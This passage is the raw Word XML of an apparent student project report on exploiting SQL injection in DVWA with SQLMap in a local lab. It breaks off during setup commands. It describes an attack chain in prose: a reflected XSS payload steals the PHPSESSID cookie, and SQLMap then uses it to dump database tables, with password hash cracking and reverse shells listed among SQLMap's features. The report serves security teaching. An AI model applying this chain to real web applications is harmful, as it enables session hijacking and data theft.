    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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The primary objective of this project is to provide a hands-on demonstration of how SQL injection vulnerabilities can be identified and exploited using SQLMap. By simulating a real-world attack in a controlled lab environment, the project aims to raise awareness about web application security flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Key Goals:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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To understand the nature and types of SQL injection attacks.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To demonstrate a real-world exploitation of DVWA using SQLMap.</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To capture and utilize a valid PHP session ID (PHPSESSID) for authenticated SQLMap usage.</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To understand the link between Cross-Site Scripting (XSS) and session hijacking.</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lastRenderedPageBreak/>
        <w:t>To explore how poorly configured web applications can lead to full database compromise.</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
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>To highlight the mitigation techniques and best practices for database and application security.</w:t>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2" w:name="_Toc195990380"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Importance of Database Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="004A6E38" w:rsidRPr="00602FA4" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>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Databases are the backbone of any application, storing sensitive data ranging from usernames and passwords to confidential business and user records. Without appropriate security measures, they become an easy target for attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Risks of Insecure Databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Data Theft: Sensitive information can be stolen, sold, or leaked.</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Data Integrity Loss: Attackers can alter or corrupt data, leading to loss of trust.</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Service Disruption: Malicious actors can drop entire databases or block legitimate access.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Legal Repercussions: Organizations may face lawsuits or regulatory action due to data breaches.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2"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Reputation Damage: Trust in the application or organization is diminished</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>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3" w:name="_Toc195990381"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Understanding SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>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SQL Injection is a type of code injection attack where malicious SQL statements are inserted into an entry field for execution. This can allow attackers to bypass authentication, view, modify, or delete data, and sometimes even execute system commands on the hosting server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRDefault="00AB3FC2" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB3FC2" w:rsidRPr="00454180" w:rsidRDefault="00AB3FC2" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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lastRenderedPageBreak/>
        <w:t>Types of SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In-Band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Error-based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Uses system error messages to gather information.</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Union-based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Uses the UNION SQL operator to extract data.</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Inferential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xml:space="preserve"> (Blind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Boolean-based: Injects conditions to observe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes.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Time-based: Injects delays (SLEEP) to infer information.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6E38" w:rsidRPr="00602FA4" w:rsidRDefault="00EB1BEB" w:rsidP="00602FA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="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Out-of-Band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Data is retrieved through DNS or HTTP channels when standard responses are not available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6E38" w:rsidRPr="00454180" w:rsidRDefault="004A6E38" w:rsidP="004A6E38">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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SQL injection vulnerabilities often arise due to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Lack of input validation or sanitation.</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4"/>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Use of dynamic SQL queries without prepared statements.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4"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Poor configuration of database permissions.</w:t>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4" w:name="_Toc195990382"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Tools and Technologies Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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To simulate and demonstrate the SQL injection attack, the following tools and technologies were used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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DVWA (Damn Vulnerable Web Application): A PHP/MySQL web app designed for security testing.</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5"/>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Apache2: Web server used to host DVWA locally.</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5"/>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lastRenderedPageBreak/>
        <w:t>MySQL: Relational database used by DVWA.</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5"/>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SQLMap: Open-source tool for detecting and exploiting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xml:space="preserve"> vulnerabilities.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5"/>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Web Browser (Firefox/Chrome): Used to interact with DVWA and capture session data.</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5"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite (Optional): Useful for intercepting requests and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> traffic.</w:t>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5" w:name="_Toc195990383"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>About SQLMap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>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SQLMap is an advanced penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. It is written in Python and supports a wide variety of SQL injection techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6E38" w:rsidRPr="00454180" w:rsidRDefault="004A6E38" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Automatic detection of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xml:space="preserve"> vulnerabilities.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6"/>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Supports MySQL, Oracle, PostgreSQL, MS SQL Server, and more.</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6"/>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Ability to dump tables, columns, data, and even hash passwords.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6"/>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Can crack hashes using dictionary attacks.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6"/>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Supports authenticated sessions via cookies or HTTP headers.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6"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Can access the file system, execute OS commands (in rare cases), and create reverse shells (depending on privileges).</w:t>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6" w:name="_Toc195990384"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Brief Description of the Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="24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 xml:space="preserve">This project demonstrates a complete exploitation chain starting from an XSS attack to capturing a valid PHP session ID and using that to exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="280" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>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lastRenderedPageBreak/>
        <w:t>Attack Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Host DVWA locally using Apache2 and MySQL.</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7"/>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Access DVWA and set its security level to “Low.”</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7"/>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Use a Reflected XSS payload to retrieve the PHPSESSID cookie.</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7"/>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Use that cookie with </w:t>
      </w:r>
      <w:r w:rsidR="00602FA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SQLMap to perform authenticated SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23D7F" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="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Enumerate the database structure and extract tables and records.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc195990385"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Demonstration and Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="28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Step-by-Step Guide:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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DVWA Setup:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>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Install Apache2, MySQL, and PHP using terminal.</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Place DVWA files in /var/www/html.</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Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>config.inc.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> with correct database credentials.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Create DVWA database and initialize tables.</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>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Start Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D23D7F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="188038"/>
          <w:sz w:val="28"/>
